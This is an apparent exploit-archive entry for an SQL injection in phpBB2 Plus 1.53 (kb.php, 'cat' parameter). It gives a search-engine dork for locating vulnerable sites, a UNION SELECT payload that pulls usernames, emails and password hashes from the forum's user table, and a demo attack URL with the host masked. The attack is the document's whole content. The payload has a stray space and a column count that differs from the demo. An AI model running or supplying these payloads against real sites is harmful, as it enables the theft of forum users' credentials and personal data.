phpBB2 Plus 1.53 (kb.php?mode) SQL Injection Vulnerability

2010-03-18
ID: 9671
CVE: None
Download vulnerable application: None
########################### 
 Author : Gamoscu 
 Homepage : http://www.1923turk.com 
 Blog      : http://gamoscu.wordpress.com/
 Dork : inurl:kb.php?mode=cat&cat= 
########################### 
 [ Vulnerable File ] 
 kb.php?mode=cat&cat= [ SQL ] 
  [ XpL ] 
 -1+union+select+1,concat(user_id,char(58),username, char(58),user_email,char(58),user_icq,char(58),use r_password),3,4,5,6+from+phpbb_users+limit+1,2-- 
  [ Demo] 
 http://www.xxxxx/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,2--
1-4-2 (www02)